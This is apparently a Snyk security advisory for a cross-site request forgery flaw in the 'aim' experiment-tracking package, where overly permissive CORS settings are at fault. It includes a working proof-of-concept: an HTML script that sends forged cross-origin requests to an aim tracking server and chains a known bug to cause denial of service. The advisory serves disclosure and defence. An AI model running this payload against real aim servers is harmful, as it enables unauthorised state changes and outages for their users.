Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.
Start learningThere is no fixed version for aim
.
aim is a super-easy way to record, search and compare AI experiments.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to overly permissive CORS settings that allow cross-origin requests from all origins. An attacker can manipulate the state of the application by sending malicious requests from a browser that the victim has authenticated with.
aim init
aim server
<script> const trackingServer = "http://x.x.x.x:53800/"; const resourceEndpoint = "tracking/client_1/get-resource"; const instructionEndpoint = "tracking/client_1/read-instruction";
const req = new XMLHttpRequest(); // This chains https://huntr.com/bounties/abcea7c6-bb3b-45e9-aa15-9eb6b224451a, causing // denial of service. But it could in practice chain any other existing vulnerability, // or just regular endpoint behaviour. req.open("POST", trackingServer + resourceEndpoint); req.send(JSON.stringify({ "resource_handler": "my_resource", "resource_type": "Repo", "args": "AAAAAAABAAAABw==" })); // A bit lazy, just make sure to do this request *after* the first one is complete. setTimeout(() => { const req = new XMLHttpRequest(); req.open("POST", trackingServer + instructionEndpoint); req.send(JSON.stringify({ "resource_handler": "my_resource", "method_name": "from_path", "args": "AAAAAAABAAAABgoAAAD+AAAAAAAAAAD+ABQAAAAEYWltOi8vMC4wLjAuMDo1MzgwMA==" })); }, 1000)
</script>